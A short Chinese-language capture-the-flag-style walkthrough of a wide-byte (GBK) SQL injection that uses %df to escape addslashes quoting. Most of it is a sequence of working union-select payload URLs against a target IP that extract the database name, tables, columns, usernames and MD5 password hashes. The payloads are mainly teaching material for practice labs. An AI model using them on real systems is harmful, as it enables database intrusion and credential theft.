SQL注入漏洞测试(宽字节)
宽字节的注入原理
正常情况下,我们输入单引号会进行测试,这个时候PHP中的addslashes函数会将(单引号,双引号,斜杠\,null字符)
等进行转义。使我们无法闭合单引号。但是如果存在宽字节注入,我们输入==%df’时,单引号会被转义为反斜杠\,URL编码
是%5c==。又如果数据库使用GBK字符编码的话,两个字符会编码成一个汉字。带到数据库中查询就是%df%5c转换为汉字
運,从而使单引号逃逸出来。
输入常规关键字发现页面并没变化,再次输入%df’页面爆出错误
接下来老步骤,利用联合查询的那一个套路
判断字段数
http://219.153.49.228:45350/new_list.php?id=1%df' order by 5 --+
判断回显点
http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,5 --+
3和5是回显点
利用回显点爆破数据库
http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,database() --+
mozhe_discuz_stormgroup
爆破表,字段和字段内容
notice,stormgroup_member
http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database() --+
name,password,status表名改为十六进制
http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x73746f726d67726f75705f6d656d626572 --+
mozhe,mozhe
http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(name) from stormgroup_member --+
3114b433dece9180717f2b7de56b28a3,
cc108ad52ecbe4ebbee499789b4aac2d
http://219.153.49.228:45350/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(password) from stormgroup_member --+
MD5解密即可成功获取key